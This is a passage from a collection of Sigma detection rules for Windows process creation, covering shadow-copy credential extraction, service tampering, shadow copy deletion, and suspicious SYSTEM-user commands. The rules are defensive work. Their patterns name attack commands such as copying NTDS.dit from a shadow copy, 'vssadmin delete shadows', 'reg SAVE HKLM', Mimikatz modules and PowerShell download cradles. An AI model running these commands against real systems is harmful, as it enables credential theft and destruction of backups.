    "path": "rules/windows/process_creation/proc_creation_win_susp_sensitive_file_access_shadowcopy.yml",
    "content": "title: Sensitive File Access Via Volume Shadow Copy Backup\nid: f57f8d16-1f39-4dcb-a604-6c73d9b54b3d\nstatus: test\ndescription: |\n    Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)\nreferences:\n    - https://twitter.com/vxunderground/status/1423336151860002816?s=20\n    - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection\n    - https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\nmodified: 2024-01-18\ntags:\n    - attack.impact\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        # copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\temp\\ntds.dit 2>&1\n        # There is an additional \"\\\" to escape the special \"?\"\n        CommandLine|contains: '\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy'\n    selection_2:\n        CommandLine|contains:\n            - '\\\\NTDS.dit'\n            - '\\\\SYSTEM'\n            - '\\\\SECURITY'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_service_creation.yml",
    "content": "title: Suspicious New Service Creation\nid: 17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8\nrelated:\n    - id: 7fe71fc9-de3b-432a-8d57-8c809efc10ab\n      type: derived\nstatus: test\ndescription: Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\n    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-14\nmodified: 2022-11-18\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sc:\n        Image|endswith: '\\sc.exe'\n        CommandLine|contains|all:\n            - 'create'\n            - 'binPath='\n    selection_posh:\n        CommandLine|contains|all:\n            - 'New-Service'\n            - '-BinaryPathName'\n    susp_binpath:\n        CommandLine|contains:\n            # Add more suspicious commands or binaries\n            - 'powershell'\n            - 'mshta'\n            - 'wscript'\n            - 'cscript'\n            - 'svchost'\n            - 'dllhost'\n            - 'cmd '\n            - 'cmd.exe /c'\n            - 'cmd.exe /k'\n            - 'cmd.exe /r'\n            - 'rundll32'\n            # Add more suspicious paths\n            - 'C:\\Users\\Public'\n            - '\\Downloads\\'\n            - '\\Desktop\\'\n            - '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n            - 'C:\\Windows\\TEMP\\'\n            - '\\AppData\\Local\\Temp'\n    condition: 1 of selection* and susp_binpath\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_service_dir.yml",
    "content": "title: Suspicious Service Binary Directory\nid: 883faa95-175a-4e22-8181-e5761aeb373c\nstatus: test\ndescription: Detects a service binary running in a suspicious directory\nreferences:\n    - https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-03-09\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - '\\Users\\Public\\'\n            - '\\$Recycle.bin'\n            - '\\Users\\All Users\\'\n            - '\\Users\\Default\\'\n            - '\\Users\\Contacts\\'\n            - '\\Users\\Searches\\'\n            - 'C:\\Perflogs\\'\n            - '\\config\\systemprofile\\'\n            - '\\Windows\\Fonts\\'\n            - '\\Windows\\IME\\'\n            - '\\Windows\\addins\\'\n        ParentImage|endswith:\n            - '\\services.exe'\n            - '\\svchost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml",
    "content": "title: Suspicious Windows Service Tampering\nid: ce72ef99-22f1-43d4-8695-419dcb5d9330\nrelated:\n    - id: eb87818d-db5d-49cc-a987-d5da331fbd90\n      type: obsolete\n    - id: 6783aa9e-0dc3-49d4-a94a-8b39c5fd700b\n      type: obsolete\n    - id: 7fd4bb39-12d0-45ab-bb36-cebabc73dc7b\n      type: obsolete\nstatus: test\ndescription: |\n    Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts\nreferences:\n    - https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg\n    - https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\n    - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955\n    - https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/delete-method-in-class-win32-service\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems)\ndate: 2022-09-01\nmodified: 2025-08-27\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1489\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_tools_img:\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n              - 'PowerShell_ISE.EXE'\n              - 'PowerShell.EXE'\n              - 'psservice.exe'\n              - 'pwsh.dll'\n              - 'sc.exe'\n              - 'wmic.exe'\n        - Image|endswith:\n    
          - '\\net.exe'\n              - '\\net1.exe'\n              - '\\PowerShell_ISE.EXE'\n              - '\\powershell.exe'\n              - '\\PsService.exe'\n              - '\\PsService64.exe'\n              - '\\pwsh.exe'\n              - '\\sc.exe'\n              - '\\wmic.exe' # wmic process call win32_service where name='servicename' delete\n    selection_tools_cli:\n        - CommandLine|contains:\n              - ' delete '\n              - '.delete()' # Get-WmiObject win32_service -Filter \"name='$serviceName'\" ).delete()\n              - ' pause ' # Covers flags from: PsService and Sc.EXE\n              - ' stop ' # Covers flags from: PsService.EXE, Net.EXE and Sc.EXE\n              - 'Stop-Service '\n              - 'Remove-Service '\n        - CommandLine|contains|all:\n              - 'config'\n              - 'start=disabled'\n    selection_services:\n        CommandLine|contains:\n            - '143Svc'\n            - 'Acronis VSS Provider'\n            - 'AcronisAgent'\n            - 'AcrSch2Svc'\n            - 'AdobeARMservice'\n            - 'AHS Service'\n            - 'Antivirus'\n            - 'Apache4'\n            - 'ARSM'\n            - 'aswBcc'\n            - 'AteraAgent'\n            - 'Avast Business Console Client Antivirus Service'\n            - 'avast! 
Antivirus'\n            - 'AVG Antivirus'\n            - 'avgAdminClient'\n            - 'AvgAdminServer'\n            - 'AVP1'\n            - 'BackupExec'\n            - 'bedbg'\n            - 'BITS'\n            - 'BrokerInfrastructure'\n            - 'CASLicenceServer'\n            - 'CASWebServer'\n            - 'Client Agent 7.60'\n            - 'Core Browsing Protection'\n            - 'Core Mail Protection'\n            - 'Core Scanning Server'\n            - 'DCAgent'\n            - 'dwmrcs'\n            - 'EhttpSr'\n            - 'ekrn'\n            - 'Enterprise Client Service'\n            - 'epag'\n            - 'EPIntegrationService'\n            - 'EPProtectedService'\n            - 'EPRedline'\n            - 'EPSecurityService'\n            - 'EPUpdateService'\n            - 'EraserSvc11710'\n            - 'EsgShKernel'\n            - 'ESHASRV'\n            - 'FA_Scheduler'\n            - 'FirebirdGuardianDefaultInstance'\n            - 'FirebirdServerDefaultInstance'\n            - 'FontCache3.0.0.0'\n            - 'HealthTLService'\n            - 'hmpalertsvc'\n            - 'HMS'\n            - 'HostControllerService'\n            - 'hvdsvc'\n            - 'IAStorDataMgrSvc'\n            - 'IBMHPS'\n            - 'ibmspsvc'\n            - 'IISAdmin'\n            - 'IMANSVC'\n            - 'IMAP4Svc'\n            - 'instance2'\n            - 'KAVFS'\n            - 'KAVFSGT'\n            - 'kavfsslp'\n            - 'KeyIso'\n            - 'klbackupdisk'\n            - 'klbackupflt'\n            - 'klflt'\n            - 'klhk'\n            - 'KLIF'\n            - 'klim6'\n            - 'klkbdflt'\n            - 'klmouflt'\n            - 'klnagent'\n            - 'klpd'\n            - 'kltap'\n            - 'KSDE1.0.0'\n            - 'LogProcessorService'\n            - 'M8EndpointAgent'\n            - 'macmnsvc'\n            - 'masvc'\n            - 'MBAMService'\n            - 'MBCloudEA'\n            - 'MBEndpointAgent'\n            - 
'McAfeeDLPAgentService'\n            - 'McAfeeEngineService'\n            - 'MCAFEEEVENTPARSERSRV'\n            - 'McAfeeFramework'\n            - 'MCAFEETOMCATSRV530'\n            - 'McShield'\n            - 'McTaskManager'\n            - 'mfefire'\n            - 'mfemms'\n            - 'mfevto'\n            - 'mfevtp'\n            - 'mfewc'\n            - 'MMS'\n            - 'mozyprobackup'\n            - 'mpssvc'\n            - 'MSComplianceAudit'\n            - 'MSDTC'\n            - 'MsDtsServer'\n            - 'MSExchange'\n            - 'msftesq1SPROO'\n            - 'msftesql$PROD'\n            - 'msftesql$SQLEXPRESS'\n            - 'MSOLAP$SQL_2008'\n            - 'MSOLAP$SYSTEM_BGC'\n            - 'MSOLAP$TPS'\n            - 'MSOLAP$TPSAMA'\n            - 'MSOLAPSTPS'\n            - 'MSOLAPSTPSAMA'\n            - 'mssecflt'\n            - 'MSSQ!I.SPROFXENGAGEMEHT'\n            - 'MSSQ0SHAREPOINT'\n            - 'MSSQ0SOPHOS'\n            - 'MSSQL'\n            - 'MSSQLFDLauncher$'\n            - 'MySQL'\n            - 'NanoServiceMain'\n            - 'NetMsmqActivator'\n            - 'NetPipeActivator'\n            - 'netprofm'\n            - 'NetTcpActivator'\n            - 'NetTcpPortSharing'\n            - 'ntrtscan'\n            - 'nvspwmi'\n            - 'ofcservice'\n            - 'Online Protection System'\n            - 'OracleClientCache80'\n            - 'OracleDBConsole'\n            - 'OracleMTSRecoveryService'\n            - 'OracleOraDb11g_home1'\n            - 'OracleService'\n            - 'OracleVssWriter'\n            - 'osppsvc'\n            - 'PandaAetherAgent'\n            - 'PccNTUpd'\n            - 'PDVFSService'\n            - 'POP3Svc'\n            - 'postgresql-x64-9.4'\n            - 'POVFSService'\n            - 'PSUAService'\n            - 'Quick Update Service'\n            - 'RepairService'\n            - 'ReportServer'\n            - 'ReportServer$'\n            - 'RESvc'\n            - 'RpcEptMapper'\n            - 
'sacsvr'\n            - 'SamSs'\n            - 'SAVAdminService'\n            - 'SAVService'\n            - 'ScSecSvc'\n            - 'SDRSVC'\n            - 'SearchExchangeTracing'\n            - 'sense'\n            - 'SentinelAgent'\n            - 'SentinelHelperService'\n            - 'SepMasterService'\n            - 'ShMonitor'\n            - 'Smcinst'\n            - 'SmcService'\n            - 'SMTPSvc'\n            - 'SNAC'\n            - 'SntpService'\n            - 'Sophos'\n            - 'SQ1SafeOLRService'\n            - 'SQL Backups'\n            - 'SQL Server'\n            - 'SQLAgent'\n            - 'SQLANYs_Sage_FAS_Fixed_Assets'\n            - 'SQLBrowser'\n            - 'SQLsafe'\n            - 'SQLSERVERAGENT'\n            - 'SQLTELEMETRY'\n            - 'SQLWriter'\n            - 'SSISTELEMETRY130'\n            - 'SstpSvc'\n            - 'storflt'\n            - 'svcGenericHost'\n            - 'swc_service'\n            - 'swi_filter'\n            - 'swi_service'\n            - 'swi_update'\n            - 'Symantec'\n            - 'sysmon'\n            - 'TeamViewer'\n            - 'Telemetryserver'\n            - 'ThreatLockerService'\n            - 'TMBMServer'\n            - 'TmCCSF'\n            - 'TmFilter'\n            - 'TMiCRCScanService'\n            - 'tmlisten'\n            - 'TMLWCSService'\n            - 'TmPfw'\n            - 'TmPreFilter'\n            - 'TmProxy'\n            - 'TMSmartRelayService'\n            - 'tmusa'\n            - 'Tomcat'\n            - 'Trend Micro Deep Security Manager'\n            - 'TrueKey'\n            - 'UFNet'\n            - 'UI0Detect'\n            - 'UniFi'\n            - 'UTODetect'\n            - 'vds'\n            - 'Veeam'\n            - 'VeeamDeploySvc'\n            - 'Veritas System Recovery'\n            - 'vmic'\n            - 'VMTools'\n            - 'vmvss'\n            - 'VSApiNt'\n            - 'VSS'\n            - 'W3Svc'\n            - 'wbengine'\n            - 'WdNisSvc'\n          
  - 'WeanClOudSve'\n            - 'Weems JY'\n            - 'WinDefend'\n            - 'wmms'\n            - 'wozyprobackup'\n            - 'WPFFontCache_v0400'\n            - 'WRSVC'\n            - 'wsbexchange'\n            - 'WSearch'\n            - 'wscsvc'\n            - 'Zoolz 2 Service'\n    condition: all of selection_*\nfalsepositives:\n    - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml",
    "content": "title: Shadow Copies Creation Using Operating Systems Utilities\nid: b17ea6f7-6e90-447e-a799-e6c0a493d6ce\nstatus: test\ndescription: Shadow Copies creation using operating systems utilities, possible credential access\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/\nauthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-22\nmodified: 2022-11-10\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1003.002\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wmic.exe'\n              - '\\vssadmin.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'wmic.exe'\n              - 'VSSADMIN.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'shadow'\n            - 'create'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrator working with shadow copies, access for backup purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml",
    "content": "title: Shadow Copies Deletion Using Operating Systems Utilities\nid: c947b146-0abc-4c87-9c64-b17e9d7274a2\nstatus: stable\ndescription: Shadow Copies deletion using operating systems utilities\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://blog.talosintelligence.com/2017/05/wannacry.html\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\n    - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\n    - https://github.com/Neo23x0/Raccine#the-process\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware\nauthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)\ndate: 2019-10-22\nmodified: 2022-11-03\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1070\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wmic.exe'\n              - '\\vssadmin.exe'\n              - '\\diskshadow.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'wmic.exe'\n              - 'VSSADMIN.EXE'\n              - 'diskshadow.exe'\n    selection1_cli:\n        CommandLine|contains|all:\n            - 'shadow'  # will match \"delete shadows\" and \"shadowcopy delete\" and 
\"shadowstorage\"\n            - 'delete'\n    selection2_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection2_cli:\n        CommandLine|contains|all:\n            - 'delete'\n            - 'catalog'\n            - 'quiet' # will match -quiet or /quiet\n    selection3_img:\n        - Image|endswith: '\\vssadmin.exe'\n        - OriginalFileName: 'VSSADMIN.EXE'\n    selection3_cli:\n        CommandLine|contains|all:\n            - 'resize'\n            - 'shadowstorage'\n        CommandLine|contains:\n            - 'unbounded'\n            - '/MaxSize='\n    condition: (all of selection1*) or (all of selection2*) or (all of selection3*)\nfalsepositives:\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\n    - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml",
    "content": "title: Windows Shell/Scripting Processes Spawning Suspicious Programs\nid: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde\nstatus: test\ndescription: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.\nreferences:\n    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\nauthor: Florian Roth (Nextron Systems), Tim Shelton\ndate: 2018-04-06\nmodified: 2023-05-23\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.005\n    - attack.t1059.001\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            # - '\\cmd.exe'  # too many false positives\n            - '\\rundll32.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n            - '\\wmiprvse.exe'\n            - '\\regsvr32.exe'\n        Image|endswith:\n            - '\\schtasks.exe'\n            - '\\nslookup.exe'\n            - '\\certutil.exe'\n            - '\\bitsadmin.exe'\n            - '\\mshta.exe'\n    filter_ccmcache:\n        CurrentDirectory|contains: '\\ccmcache\\'\n    filter_amazon:\n        ParentCommandLine|contains:\n            # FP - Amazon Workspaces\n            - '\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\setup-scheduledtask.ps1'\n            - '\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\set-selfhealing.ps1'\n            - '\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\check-workspacehealth.ps1'\n            - '\\nessus_' # Tenable/Nessus VA Scanner\n    filter_nessus:\n        CommandLine|contains: '\\nessus_' # Tenable/Nessus VA Scanner\n    filter_sccm_install:\n        ParentImage|endswith: '\\mshta.exe'\n        Image|endswith: '\\mshta.exe'\n        ParentCommandLine|contains|all:\n            - 'C:\\MEM_Configmgr_'\n            - 
'\\splash.hta'\n            - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'\n        CommandLine|contains|all:\n            - 'C:\\MEM_Configmgr_'\n            - '\\SMSSETUP\\BIN\\'\n            - '\\autorun.hta'\n            - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Administrative scripts\n    - Microsoft SCCM\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_sysnative.yml",
    "content": "title: Process Creation Using Sysnative Folder\nid: 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab\nstatus: test\ndescription: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)\nreferences:\n    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-08-23\nmodified: 2025-10-08\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains: ':\\Windows\\Sysnative\\'\n        - Image|contains: ':\\Windows\\Sysnative\\'\n    filter_main_ngen:\n        Image|contains:\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\v'\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\v'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm\\v'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v'\n        Image|endswith: '\\ngen.exe'\n        CommandLine|contains: 'install'\n    filter_optional_xampp:\n        CommandLine|contains|all:\n            - '\"C:\\Windows\\sysnative\\cmd.exe\"'\n            - '\\xampp\\'\n            - '\\catalina_start.bat'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml",
    "content": "title: System File Execution Location Anomaly\nid: e4a6b256-3e47-40fc-89d2-7a477edd6915\nrelated:\n    - id: be58d2e2-06c8-4f58-b666-b99f6dc3b6cd # Dedicated SvcHost rule\n      type: derived\nstatus: test\ndescription: |\n    Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.\nreferences:\n    - https://twitter.com/GelosSnake/status/934900723426439170\n    - https://asec.ahnlab.com/en/39828/\n    - https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html\nauthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2017-11-27\nmodified: 2026-02-12\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\atbroker.exe'\n            - '\\audiodg.exe'\n            - '\\bcdedit.exe'\n            - '\\bitsadmin.exe'\n            - '\\certreq.exe'\n            - '\\certutil.exe'\n            - '\\cmstp.exe'\n            - '\\conhost.exe'\n            - '\\consent.exe'\n            - '\\cscript.exe'\n            - '\\csrss.exe'\n            - '\\dashost.exe'\n            - '\\defrag.exe'\n            - '\\dfrgui.exe' # Was seen used by Lazarus Group - https://asec.ahnlab.com/en/39828/\n            - '\\dism.exe'\n            - '\\dllhost.exe'\n            - '\\dllhst3g.exe'\n            - '\\dwm.exe'\n            - '\\eventvwr.exe'\n            - '\\fsquirt.exe' # was seen used by sidewinder APT - https://securelist.com/sidewinder-apt/114089/\n            - '\\finger.exe'\n            - '\\logonui.exe'\n            - '\\LsaIso.exe'\n            - '\\lsass.exe'\n            - '\\lsm.exe'\n            - '\\msiexec.exe'\n            - '\\ntoskrnl.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - 
'\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\runonce.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\schtasks.exe'\n            - '\\services.exe'\n            - '\\sihost.exe'\n            - '\\smartscreen.exe'\n            - '\\smss.exe'\n            - '\\spoolsv.exe'\n            - '\\svchost.exe'\n            - '\\taskhost.exe'\n            - '\\taskhostw.exe'\n            - '\\Taskmgr.exe'\n            - '\\userinit.exe'\n            - '\\werfault.exe'\n            - '\\werfaultsecure.exe'\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n            - '\\winver.exe'\n            - '\\wlanext.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n            - '\\wsmprovhost.exe' # Was seen used by Lazarus Group - https://asec.ahnlab.com/en/39828/\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemTemp\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\uus\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_optional_system32:\n        Image|contains: '\\SystemRoot\\System32\\'\n    filter_main_powershell:\n        Image|contains:\n            - 'C:\\Program Files\\PowerShell\\7\\'\n            - 'C:\\Program Files\\PowerShell\\7-preview\\'\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview' # pwsh installed from Microsoft Store\n        Image|endswith: '\\pwsh.exe'\n    filter_main_wsl_programfiles:\n        Image|startswith:\n            - 'C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux'\n            - 'C:\\Program Files\\WSL\\'\n        Image|endswith: '\\wsl.exe'\n    filter_main_wsl_appdata:\n        
Image|startswith: C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\WindowsApps\\'\n        Image|endswith: '\\wsl.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml",
    "content": "title: Suspicious SYSTEM User Process Creation\nid: 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09\nstatus: test\ndescription: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)\nreferences:\n    - Internal Research\n    - https://tools.thehacker.recipes/mimikatz/modules\nauthor: Florian Roth (Nextron Systems), David ANDRE (additional keywords)\ndate: 2021-12-20\nmodified: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134\n    - attack.t1003\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_special:\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\cscript.exe'\n              - '\\forfiles.exe'\n              - '\\hh.exe'\n              - '\\mshta.exe'\n              - '\\ping.exe'\n              - '\\wscript.exe'\n        - CommandLine|re: 'net\\s+user\\s+'\n        - CommandLine|contains:\n              # - 'sc stop ' # stops a system service # causes FPs\n              - ' -NoP '  # Often used in malicious PowerShell commands\n              - ' -W Hidden '  # Often used in malicious PowerShell commands\n              - ' -decode '  # Used with certutil\n              - ' /decode '  # Used with certutil\n              - ' /urlcache '  # Used with certutil\n              - ' -urlcache '  # Used with certutil\n              - ' -e* JAB'  # PowerShell encoded commands\n              - ' -e* SUVYI'  # PowerShell encoded commands\n              - ' -e* SQBFAFgA'  # PowerShell encoded commands\n              - ' -e* aWV4I'  # PowerShell encoded commands\n              - ' -e* IAB'  # PowerShell encoded commands\n              - ' -e* PAA'  # 
PowerShell encoded commands\n              - ' -e* aQBlAHgA'  # PowerShell encoded commands\n              - 'vssadmin delete shadows'  # Ransomware\n              - 'reg SAVE HKLM'  # save registry SAM - syskey extraction\n              - ' -ma '  # ProcDump\n              - 'Microsoft\\Windows\\CurrentVersion\\Run'  # Run key in command line - often in combination with REG ADD\n              - '.downloadstring('  # PowerShell download command\n              - '.downloadfile('  # PowerShell download command\n              - ' /ticket:'  # Rubeus\n              - 'dpapi::'     # Mimikatz\n              - 'event::clear'        # Mimikatz\n              - 'event::drop'     # Mimikatz\n              - 'id::modify'      # Mimikatz\n              - 'kerberos::'       # Mimikatz\n              - 'lsadump::'      # Mimikatz\n              - 'misc::'     # Mimikatz\n              - 'privilege::'       # Mimikatz\n              - 'rpc::'      # Mimikatz\n              - 'sekurlsa::'       # Mimikatz\n              - 'sid::'        # Mimikatz\n              - 'token::'      # Mimikatz\n              - 'vault::cred'     # Mimikatz\n              - 'vault::list'     # Mimikatz\n              - ' p::d '  # Mimikatz\n              - ';iex('  # PowerShell IEX\n              - 'MiniDump'  # Process dumping method apart from procdump\n    filter_main_ping:\n        CommandLine|contains|all:\n            - 'ping'\n            - '127.0.0.1'\n            - ' -n '\n    filter_vs:\n        Image|endswith: '\\PING.EXE'\n        ParentCommandLine|contains: '\\DismFoDInstall.cmd'\n    filter_config_mgr:\n        ParentImage|contains: ':\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n    filter_java:\n        ParentImage|contains:\n            - ':\\Program Files (x86)\\Java\\'\n            - ':\\Program Files\\Java\\'\n        ParentImage|endswith: '\\bin\\javaws.exe'\n        Image|contains:\n            - ':\\Program Files (x86)\\Java\\'\n            - 
':\\Program Files\\Java\\'\n        Image|endswith: '\\bin\\jp2launcher.exe'\n        CommandLine|contains: ' -ma '\n    condition: all of selection* and not 1 of filter_*\nfalsepositives:\n    - Administrative activity\n    - Scripts and administrative tools used in the monitored environment\n    - Monitoring activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml",
